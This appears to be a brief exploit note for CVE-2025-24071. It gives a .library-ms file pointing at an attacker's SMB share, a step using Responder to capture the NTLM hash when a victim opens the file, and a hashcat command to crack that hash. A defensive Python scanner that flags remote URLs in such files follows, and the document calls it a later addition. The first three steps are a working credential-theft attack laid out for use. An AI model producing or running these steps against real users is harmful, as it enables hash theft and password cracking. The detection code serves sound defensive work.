# CVE-2025-24071

###### ref https://cti.monster/blog/2025/03/18/CVE-2025-24071.html

![image](https://hackmd.io/_uploads/SkBMUPUaJl.png)

# 1. Windows Library

### Create a .library-ms file

```text
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <version>2</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\192.168.0.202\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
```

# 2. Listen with Responder

As soon as the other party clicks the file, the hash is received.

### https://github.com/lgandx/Responder

![image](https://hackmd.io/_uploads/HkBlhUUpkx.png)

# 3. Crack with hashcat

### `hashcat.exe -m 5600 -a 0 hash.txt passwd.txt`

![hashcat](https://hackmd.io/_uploads/BJptvPU6Jl.png)
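
A defensive triage check for the file format shown in step 1, added here as an example (it is not from the original note or the referenced blog): it parses `.library-ms` files and reports every `<simpleLocation><url>` that points at a remote host. The function names, the constructed samples and the choice to flag unparseable files are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}
# Matches \\host\share, //host/share, or scheme://host/... (file:///C:/... has no host).
REMOTE = re.compile(
    r"^(?:\\\\|//)(?P<unc>[^\\/]+)|^[a-z][a-z0-9+.-]*://(?P<host>[^\\/]+)", re.I)

# Constructed samples: the first mirrors the page's file, the second is local-only.
TEMPLATE = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
            b'<searchConnectorDescriptionList><searchConnectorDescription>'
            b'<simpleLocation><url>%s</url></simpleLocation>'
            b'</searchConnectorDescription></searchConnectorDescriptionList>'
            b'</libraryDescription>')
SAMPLE_REMOTE = TEMPLATE % rb"\\192.168.0.202\share"
SAMPLE_LOCAL = TEMPLATE % rb"C:\Users\Public\Documents"


def remote_locations(data: bytes) -> list[str]:
    """Return the remote hosts referenced by a .library-ms document."""
    # A library file has no reason to carry a DTD; refuse it before parsing.
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        raise ValueError("unexpected DTD or entity declaration")
    root = ET.fromstring(data)
    hosts = []
    for url in root.iterfind(".//lib:simpleLocation/lib:url", NS):
        match = REMOTE.match((url.text or "").strip())
        if match:
            hosts.append(match.group("unc") or match.group("host"))
    return hosts


def scan_tree(root: str) -> dict[str, list[str]]:
    """Map each suspicious .library-ms file under root to what was found in it."""
    findings = {}
    for path in Path(root).rglob("*.library-ms"):
        try:
            hosts = remote_locations(path.read_bytes())
        except (ET.ParseError, ValueError, OSError) as exc:
            hosts = [f"unparseable: {exc}"]  # malformed files deserve a look too
        if hosts:
            findings[str(path)] = hosts
    return findings


if __name__ == "__main__":
    print(remote_locations(SAMPLE_REMOTE), remote_locations(SAMPLE_LOCAL))
```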